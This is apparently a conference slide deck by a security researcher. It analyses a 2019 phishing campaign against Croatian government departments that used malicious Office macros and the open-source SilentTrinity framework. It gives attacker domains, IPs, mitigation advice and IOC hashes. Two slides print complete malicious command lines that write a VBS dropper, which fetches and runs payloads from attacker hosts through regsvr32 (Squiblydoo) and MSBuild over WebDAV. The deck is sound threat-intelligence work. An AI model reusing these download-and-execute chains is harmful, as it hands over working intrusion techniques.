# IronPython on the dark side: the silent trio from Croatia #### Alexey Vishnyakov, Senior specialist / Positive Technologies ----- ## црщфьш whoami #### • A senior specialist at Expert Security Center, Positive Technologies • Threats research • APT groups tracking • Software development • Reporting ###### hd #PHD ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## Payload delivery #### • Last printed: 2018-07-25 00:12:30 (UTC) • Last saved: 2019-04-01 16:28:07 (UTC) • First VT submission: 2019-04-02 09:58:13 (UTC) • Country: HR (Croatia) ##### imglink #### • Codepage: 1252 ANSI Latin 1; Western European (Windows) • Author: Windows User • Last modified by: Teken ###### hd #PHD ##### imglink ----- ## Payload delivery ###### • Comments: cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run "net use https://postahr.vip", 0, False: Wscript.Sleep 10000: objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll", 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs ##### WebDAV server Squiblydoo technique ###### hd #PHD ###### 0, False: Wscript.Sleep 10000: ##### WebDAV server ----- ## Payload delivery #### • After opening: ###### hd #PHD ----- ## Payload delivery #### • After allowing macro: ###### hd #PHD ----- ## Payload delivery #### • VBA macro: ##### VBS drop Autorun only, no launch ###### hd #PHD ##### VBS drop Autorun only, no launch ----- ## Payload delivery #### • VBA macro: ##### Some kind of builder? ###### hd #PHD ##### Some kind of builder? ----- ## Payload delivery #### • issuu.com : • stackoverflow.com : • dummies.com : ###### hd #PHD ----- ## Payload delivery #### • Downloaded update.sct: ###### hd #PHD ----- ## Payload delivery #### • Downloaded update.sct: ###### hd #PHD ----- ## Payload delivery #### • rastamouse.me : • github.com : ###### hd #PHD ----- ## Payload delivery #### • Deserialized object – PE .NET • Sharpick - application to load and run PowerShell code via the .NET assemblies ###### hd #PHD ----- ## Payload delivery #### • PowerPick GitHub project ###### hd #PHD ----- ## Payload delivery #### • dnSpy decompilation: ###### hd #PHD ----- ## Payload delivery #### • Base64 decoded: ###### hd #PHD ----- ## Payload delivery #### • PowerShell script semi-beautified: ##### RC4 decryption ###### hd #PHD ##### RC4 decryption ----- ## Payload delivery #### • fireeye.com : ###### hd #PHD ----- ## Payload delivery #### • payatu.com : ###### hd #PHD ----- ## Payload delivery #### • Last printed: 2019-04-02 08:22:56 (UTC) • Last saved: 2019-04-02 08:23:28 (UTC) (~ +16 hours) • First VT submission: 2019-04-02 16:52:56 (UTC) (~ +7 hours) • Country: HR (Croatia) • Last modified by: Luzer ###### hd #PHD ----- ## Payload delivery ###### • Comments: cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"):objShell.Run "C:\windows\system32\cmd.exe /c net use \\176.105.255.59\webdav",0:Wscript.Sleep 60000: objShell.Run "%windir%\Microsoft.Net\Framework\v4.0.30319\msbuild.exe \\176.105.255.59\webdav\msbuild.xml", 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs ##### MSBuild inline technique SMB server ###### hd #PHD ##### SMB server ----- ## Payload delivery #### • Previous vs current macro: ##### Launch added ###### hd #PHD ##### Launch added ----- ## Payload delivery #### • Downloaded msbuild.xml: ###### hd #PHD ----- ## Payload delivery #### • Downloaded msbuild.xml: ###### hd #PHD ----- ## Payload delivery #### • Is an example publicly available? ##### imglink ###### hd #PHD ##### imglink ----- ## Payload delivery #### • Deserialized object – PE .NET • SILENTTRINITY? ###### hd #PHD ----- ## Payload delivery #### • A few old documents • First VT submission: 2018-08-23 13:20:23 (UTC) • Country: HR (Croatia) • Last modified by: Stringer • First VT submission: 2018-08-29 09:04:26 (UTC) • Country: ? • Last modified by: Stringer ###### hd #PHD ----- ## Payload delivery #### • Two macro of old documents: ##### Download via certutil Launch via WMI ###### hd #PHD ##### Launch via WMI ----- ## Payload delivery #### • New vs old macro: ##### Comments from the guidelines ###### hd #PHD ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## SilentTrinity framework #### • https://www.instagram.com/silenttrinity ## Sophisticated and mysterious hacker! No doubt! ##### imglink ###### hd #PHD ## Sophisticated and mysterious hacker! No doubt! ##### imglink ## Sophisticated and mysterious hacker! No doubt! ##### imglink ----- ## SilentTrinity framework #### • Created: 2018-10-06 • Author: Marcello Salvati ###### • https://github.com/byt3bl33d3r/SILENTTRINITY • https://www.convergeconference.org/speakers/marcello-salvati/ • https://www.blackhillsinfosec.com/team/marcello-salvati/ • https://www.irongeek.com/i.php?page=videos/derbycon8/track 2-05-ironpython-omfg-marcello-salvati • https://twitter.com/byt3bl33d3r ##### imglink ###### hd #PHD ##### imglink ----- ## SilentTrinity framework ##### imglink ###### hd #PHD ----- ## SilentTrinity framework #### • The most interesting features • IronPython/Boo languages supported • All in memory • Diffie–Hellman key exchange • ZIP and jobs are AES encrypted • Compatible with proxy • HTTP/HTTPS ###### hd #PHD ----- ## SilentTrinity framework ##### imglink ###### hd #PHD ##### imglink ----- ## SilentTrinity framework ###### hd #PHD ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## Attack infrastructure #### • Domains under WhoisGuard, Inc. (Panama) privacy protection ##### Domain Registered On Mimics to Industry konzum.win 2018-05-25 konzum.hr Retail postahr.online 2018-08-22 posta.hr Postal services posteitaliane.live 2019-01-16 posteitaliane.it Postal services postahr.vip 2019-02-06 posta.hr Postal services ###### hd #PHD |Domain|Registered On|Mimics to|Industry| |---|---|---|---| |konzum.win|2018-05-25|konzum.hr|Retail| |postahr.online|2018-08-22|posta.hr|Postal services| |posteitaliane.live|2019-01-16|posteitaliane.it|Postal services| |postahr.vip|2019-02-06|posta.hr|Postal services| ##### Mimics to Industry konzum.hr Retail posta.hr Postal services posteitaliane.it Postal services posta.hr Postal services ----- ## Attack infrastructure #### • IPs related to Breezle LLC hosting provider (Amsterdam, Netherlands) • 176.105.254.52 • 176.105.255.59 • 93.170.105.32 ###### hd #PHD ----- ## Attack infrastructure ##### Breezle LLC WhoisGuard Inc. ###### hd #PHD ##### Breezle LLC ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## Takeaways #### • News of an attack: 2019-04-03 ##### imglink ###### hd #PHD ##### imglink ----- ## Takeaways #### • Victims: Croatian government departments ##### imglink ###### hd #PHD ##### imglink ----- ## Takeaways #### • How to defend? • Application control over trusted software (certutil, regsvr32, msbuild, net, wmic …) • Inspection of links in the mail • Periodic memory scans ###### hd #PHD ----- ## Takeaways #### • Completely open-source but powerful and effective kill chain • The first SilentTrinity framework abuse we know • Metasploit, Empire, Koadic … pros for red teams and cons for defenders ###### hd #PHD ----- ## Agenda ### • Payload delivery • SilentTrinity framework • Attack infrastructure • Takeaways • IOCs ###### hd #PHD ----- ## IOCs #### • 13db33c83ee680e0a3b454228462e73f • hxxps://postahr.vip/page/1/update.sct • 0adb7204ce6bde667c5abd31e4dea164 • 831b08d0c650c8ae9ab8b4a10a199192 • hxxps://posteitaliane.live/owa/mail/archive.srf • [\\]176.105.255.59\webdav\msbuild.xml • hxxps://176.105.255.59:8089 • 79e72899af1e50c18189340e4a1e46e0 • 92530d1b546ddf2f0966bbe10771521f ###### hd #PHD ----- ## IOCs #### • 78184cd55d192cdf6272527c62d2ff89 • hxxp://198.46.182.158/bat3.txt • c84b7c871bfcd346b3246364140cd60f • hxxps://konzum.win/bat3.txt • 92530d1b546ddf2f0966bbe10771521f • 176.105.254.52 • postahr.online • 93.170.105.32 • geomeny.bid ###### hd #PHD ----- # Thank you! ##### Alexey Vishnyakov avishnyakov@ptsecurity.com -----